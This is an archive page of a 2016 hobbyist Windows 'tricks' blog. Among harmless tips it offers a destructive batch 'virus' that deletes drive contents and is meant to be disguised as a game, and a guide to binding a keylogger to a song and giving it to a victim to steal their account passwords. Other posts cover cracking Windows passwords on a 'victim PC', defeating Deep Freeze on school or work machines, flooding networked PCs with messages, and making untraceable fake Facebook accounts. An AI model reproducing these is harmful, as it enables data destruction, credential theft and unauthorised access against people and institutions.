Wednesday 30 November 2016

How to make your PC welcome you on bootup

I'm sorry for disappearing for so long but I promise to pay by uploading an awesome thing before the year ends. While working on my new project an idea came to me and here I am publishing a part of it (the complete project will be published once I'm done with it).
We're all(mostly) familiar with Windows welcome screen(which is very non-interactive). So I decided to publish a trick that could help you have a person(kind of) welcome you every time you boot your PC up.
As always just follow the steps:-
1. Open Notepad
2. Copy the code

dim speechobject
set speechobject=createobject("sapi.spvoice")
speechobject.speak "Welcome Sir"


3. Paste on notepad
4. Save the file with the name speak.vbs
5. Press Start+R (To open Run window)
6. Enter shell:startup
7. Copy the file speech.vbs from wherever it is saved
8. Right click in the window opened and select paste shortcut.

Obviously you can change the Message Welcome Sir by changing the text within the quotes , but don't remove the quotes.

Feeling Lazy? Download the setup.

Friday 23 September 2016

How to hack Windows User password

This article is for recovering a lost windows password, and of course it's time taking, if you want to hack a PC only to access the files or copying them or deleting them follow this post.

Hack a Windows Password Steps->


Choose the Correct Ophcrack LiveCD Version
After clicking the Download ophcrack LiveCDbutton , the webpage above should display.
Click the button corresponding to the version of Windows on the computer you'll be recovering the password on.
In other words, if you've forgotten the password on:
Windows 8: Click on ophcrack Vista/7 LiveCD.Windows 7: Click on ophcrack Vista/7 LiveCD.Windows Vista: Click on ophcrack Vista/7 LiveCD.
Windows XP: Click on ophcrack XP LiveCD.
Just to be clear, the OS of the computer you're using right now doesn't matter. You want to download the appropriate Ophcrack LiveCD version for the computer that you're cracking the password on.
Ophcrack doesn't yet support Windows 10.
On the next webpage, Ophcrack LiveCD should begin downloading automatically. The download is in the form of a single iso.
If prompted, choose to Download File or Save to Disk - however your browser phrases it. Save the file to your Desktop or another location that's easy to locate. Do not choose to Open the File.
The size of the Ophcrack LiveCD software you're downloading is fairly large.
The Windows 8/7/Vista version is 649 MB and the Windows XP version is 425 MB.
Depending on your current Internet speed, the Ophcrack LiveCD download could take as little as a few minutes or as long as an hour to download.

2. Make a drive bootable and copy the iso to it. To make it bootable follow this post.

3. Plug the drive to the victim PC.

4. Start the PC and immediately press ESC or F10 depending upon how is boot menu opened on your PC. You might find which key to press during the startup where usually at the bottom the key info is given.

Wait for the Ophcrack LiveCD Menu to Appear
After the initial startup of your computer is complete, as shown in the previous step, the Ophcrack LiveCD menu should display.
Press Enter as soon as you see such a window.
ISO files are special kinds of files and have to burned differently than you may have burned music or other files. Go back to Step 4 and try burning the Ophcrack LiveCD ISO file again.
Wait for Ophcrack LiveCD to Load
The next screen consists of several lines of text that quickly run down the screen. You don't need to do anything here.
Watch for Hard Drive Partition Information to Display
The next step in the Ophcrack LiveCD boot process is this little window that appears on screen. It may appear and disappear very quickly so you could miss it, but I wanted to point it out because it will be a window that runs in the background that you may see.
This message is simply confirming that a partition with encrypted password information on it has been found on your PC. This is good news!
Wait for Ophcrack LiveCD to Recover Your Password
The next screen is the Ophcrack LiveCD software itself. Ophcrack will attempt to recover the passwords for all of the Windows user accounts that it can find on your computer. This password cracking process is completely automated.
The important things to look for here are the accounts listed in the User column and the passwords listed in the NT Pwd column. If the user account you're looking for isn't listed, Ophcrack didn't find that user on your computer.
If the NT Pwd field is blank for a particular user, the password has not been recovered yet.
Look toward the bottom of the user list - find your user account .
In under one minute, Ophcrack will recover the password to this account You can ignore any other accounts you're not interested in recovering the passwords for.
After Ophcrack recovers your password, write it down, remove the Ophcrack disc or flash drive and then restart your computer. You don't need to exit the Ophcrack software - it won't harm your computer to power it off or restart it while it's running.
Now that your password has been recovered using Ophcrack LiveCD, simply enter your password when prompted after booting your computer normally.

Thursday 22 September 2016

How to Hide secret files into audio files.

Hey Guys today I'm gonna teach you steganography, Steganography is hiding your secret data into song or images or any other such file so that the secret files can be discovered only by someone who knows the correct algorithm and the correct key, it's useful when you want to store data on your work or school PC and don't want it to be seen by anyone specially the sys admins.
To accomplish this task I'm gonna use a third party software called Deep Sound, which you can download from here.
Once you download and install it. It's an easy task to hide data into songs. (This software is capable only of storing them into songs,  however you can always get other such software which can do that in other formats as well)

Steps to hide->
1. Open Deep Sound
2. Hit the button that says Open Carrier files
3. Add a song or any other audio file
4. Click add secret files -> Add the secret files
5. To add a password hit encrypt files and set the password.
6. Now choose the location where the new file is to be saved.
Nd it's done now you have your secret file hidden inside an audio file and cannot by viewed by anyone. To share it with anyone secretly you'd just have to tell the person the password and send the file so that he could decrypt the file on the other end.

If someone opens the audio file the audio is played and the person couldn't make out that some other file is hidden into that audio file.

Wednesday 21 September 2016

Clean Temp files automatically without any software

When we are using various softwares on our PC they keep on making their temporary files that take space on the drive if these temporary files are not deleted frequently they will take up a large space of the drive which could result in slower booting and can cause the PC to hang very frequently.
To avoid such conditions it is advised to clean the temporary files of the PC every time it is switched on or before shutting down , but if you still don't want to do this again and again you can always use software like CCleaner or any other such softwares but if you don't even want to download a software you can use a bat script that does this for you during startup.
This single kb bat script can remove temporary files of any size.

How to make a Bat file that cleans temporary files at startup

1. Copy the code below to notepad

rd /s /q %temp% mkdir %temp% rd /s /q c:\windows\temp\ mkdir c:\windows\temp\

2. Save the file as tmpclr.bat [.bat is important]

3. Move the file anywhere on your PC
4. Select the file and hit Ctrl+C to Copy the file
5. Press Start+R
6. Open shell:startup using Run opened in previous step
7. On left click menu select paste shortcut 

And you are all set, next time you Switch your PC on Temp would already be empty.

Feeling Lazy? Just Download the package I created from my drive
 

Tuesday 20 September 2016

Deep Freeze-Anti Deep Freeze-Anti (How to hack deep freezed computers)

For all those who don't what deep freeze is and for what purposes it is used let me introduce you to Deep Freeze.
Deep freeze is a Software used by sys admins to lock the state a computer is in. Specially used at places like Schools Colleges or shared PCs at offices. What it does is records the state the PC is in during set-up and refreshes to that same state by deleting all the files and reconfiguring all the setting changed during locked state.
It is seriously a pain in the butt when you download something to a PC at work and it's vanished till you return - coz someone felt the need to shut it down............. !(

If you are a sys admin reading this blog and want to download Deep Freeze, get it here
But if you want to HACK this thing this is where the fun begins
Just keep following the steps.
1.f Download Anti-DeepFreeze rom my Drive
2. Extract the file.
3. Copy the executable to portable storage
4. Plug the drive into the PC that has Deep Freeze
5. Run the Executable
6. It'll tell u the version of the Deep Freeze installed on the target PC
7. Select the version told by the AntiDeepFreeze
8. Enter the new password

And now you are the master.
9. Check the taskbar for DeepFreeze logo which looks something like the anti one but just without that cross.
10. Hold down the SHIFT key and double-click the Deep Freeze icon. Alternatively, you can press CTRL+ALT+SHIFT+F6. A Password dialog is displayed. Enter your password and click OK.
11. Now once you enter the password the PC is unlocked and the files you keep will be preserved . To lock it back just open it and lock.
Now that you have the password even your sys admin can't do anything

Pls Don't forget to Like at FB - AkhandsNet@FB

Akhand Yaduvanshi

Tuesday 12 July 2016

How to make a fake facebook ID that cant be traced through email

At times we want to have a fake Facebook ID but we don't want to use our own email ID.
In that case you can use this little trick to get your job done.
STEPS-

1. Open www.guerillamail.com and copy the email address you get.
2.  Open Facebook.com
3. Fill up the sign up form using any fake identity.
4. Paste the guerillamail ID
5. Sign In
6. Put a DP and fill the info
7. Post some photos
8. Now you have a original looking fake ID

Highly recommended to use a proxy or VPN to do this job.See this article for info

Note- This trick is not complete foolproof. This doesnt means that the Security agencies can't find you or trace you.This is only for educational purpose. Don't do anything illegal.

Sunday 5 June 2016

How to access PC without its password/how to hack Windows

Hey guys today I'm gonna give you the trick that's gonna help you use a PC that you don't know the password of, though there are tricks that can be useful if you want to "hack" a certain OS password but this one is gonna work on most of the computers.
To access the computer without the password all you have to do is to follow these simple steps.


1.  Download Ubuntu image file from the internet.
2.  Make a pendrive bootable by following this tutorial.
3.  Burn the image on the pen drive.
4.  Restart the PC.
5.  Open the boot menu and boot using the pen drive.
6.   Use the Live boot option on Ubuntu.
7.   Now you don't need the password of the installed OS and you have the complete access to the files in the PC.
8.   Like our FB page using the button at the bottom of this webpage :p ;)

Saturday 28 May 2016

How to make a pendrive/other removable drive bootable without any software.

If you have a bootable image file of an Operating System that you want to install in your PC and you don't want to waste a DVD by burning the image, using it once and then throwing it off you can use a removable storage device like a pen drive to install the OS. To do so, follow these steps:-

  1. First of all copy the contents of the pen drive to your PC so that you don't lose them.
  2. Open CMD
  3. Type the following commands one by one.
Diskpart
List disk
 
     4.  Now check which of the drive you want to use (usually it is drive 1 if you haven't plugged any other device)
   
Select disk (number)
Clean
Create partition primary
Format fs=fat32

This will take some time and when it is done you have to copy the image file to the pen drive.

Now plug the pen drive to the PC and boot it as you generally use a DVD to install the OS.

Sunday 8 May 2016

How to crash all PC on a network

Are you bored up doing your computer job on a network or are you unable to complete the assignments given in the computer lab. If the case is anything like this or you just want to have fun crashing all PCs on a home network you are at the correct place cause this is where I m gonna give you the simple 3 line copy-paste code.
Though you could simply copy the code below but if you wanna know how it works then here is the line-wise description.

:net
rem the line 1 declares a checkpoint that will be used later.
Net send * (Crashed Ya baby)
rem line 2 is the line that keeps sending messages to all PCs on the network
goto net
rem line 3 makes the program start from ":net" checkpoint which makes the message pop up infinite times.

Copy the code above and paste it on a notepad file and name it whatever.bat

If you encounter any issues with this please lemme know at akhandyadav.com@gmail.com
Or
The comment box is there forever.

Monday 4 April 2016

How to remain anonymous on the web/ How to visit blocked websites from schools cooleges offices or wifis.

Today I decided to write something regarding security, btw I am pleased to tell that the last article by Ray Blue earned a lot of visits on the web. So , this time I will tell u how to remain private on the web.
These days almost everyone is aware that the websites we visit specially, our favourite websites including fb and Google keep spying on us and some hacker might also be collecting all our activities so I will tell u how to remain anonymous on the web. Another trick this article covers is how to visit blocked websites in schools and offices and through wifis .
So In this article I'll tell u about Orbot by Tor project. This project lets ppl remain anonymous on the web and let them visit the blocked websites.
First of all, for Android, download Orbot on android. U can find on play store.For PC download For and install Tue respective app. Now enabling this on your device will assure u anonymity on the web.

How this works-
The packets you send and receive are transported through another server and the websites u visit never know that u r using them because you are using a fake identity or an online mask. When these packets are sent through another app. The WiFi and other web blockers think that u r visiting the app not the blocked website.So this is how it fools everyone.

Saturday 19 March 2016

Hack Facebook,Gmail,Twitter,Instagram,LinkedIn,Yahoo Mail,Hotmail............

Hey guys, if u r willing to hack a Facebook account but don't want to go deep in the hacking studies and all I think u r at the right place bcoz today I'm going to give you a simple trick to hack any Facebook or Gmail or Twitter or whatsoever.
Keep following these simple steps and you would undoubtedly succeed.
Steps
1. Download any keylogger like Rinlogger,I'm gonna use it for the tutorial.
2. Disable your antivirus.
3. Run the program.
4. In the E-mail section u r required to have 2 email IDs. One will send the password and one is gonna receive them. So the one u re using to send just type in your ID and password there. If you use gmail its better otherwise Google your email provider's SMTP server URL.
5.Enter your second e-mail or you can add more there if you want to . You can add mine as well :p
6. Select the settings you want.
7. Bind the file to another file like an application or a song.
8.Create the server.
9. Now give the created file to the victim and make him run it.
10. Now you'll start receiving logs from his device.
11. as soon as he logs in to any of these you can get the passwords.


Mail me if any queries-
Hack3rm8 (Ray Blue)
hack3rm8@gmail.com

Google for Rinlogger and u can find it easily.

Wednesday 17 February 2016

VLC Fun

This time I've got a little fun trick. If you remember the auditoriums that have the screen behind the stage and it shows an uncountable number of copies of itself, this trick is gonna be like that and if you don't understand the example above just try the trick and chances are that you understand it easily.
Steps-
1. Open VLC player
2. Press Ctrl+N
3. Type Screen:// on the dialogue box that appears
4. Press Enter
5. See the magic
6. Try opening start menu as well.

Tuesday 9 February 2016

Make a virus that deletes all the data on PC

Are you jealous of some friend who has more games than you?
Do you want to delete all the data of your competitor?
If there is any such reason you want to wipe all the data of any PC I've got something interesting for you.
In this article I'm gonna tell you how to make a virus which does it.
Steps-
1. Open Notepad
2. Copy the following code into it

@Echo off
Del D:\ *.*|y
Del E:\ *.*|y
Del F:\ *.*|y
Del C:\ *.* |y

3. Save it with any name but write .bat at the end.
4. Now change it's icon.

This way you can fool your friends by telling them that this is a game or something else.
Never open it on your own PC otherwise you are gonna lose you data.

Sunday 31 January 2016

Personal Diary in Notepad

If u r planning to download a personal diary software leave it beacuse I am going to share a trick with you to make your useless notepad work as a personal diary.
Steps
1.Open Notepad
2.Type .LOG
3.Save it with any name.
4.Open it and start making your entries.
5.Save and reopen whenever you want.

Monday 18 January 2016

Hide images from Android gallery without any app

For my first post of 2016,
I came up with many ideas but I was not sure if it was kind of legal to post it publicly so it took me time to make my first post of the year.
By the way, happy new year, 2016.
In this post dear reader, I am going to tell you an effective way to hide some images from your gallery.
Sometimes you have to hide some media from other people for uncertain causes and the solution to thou problem is here.
Steps-
1. Open your file manager

2. Make a new folder with its name starting with a '.' Like if you want your folder's name to be Mystuff, make it .mystuff

Credit-
Ayush Saxena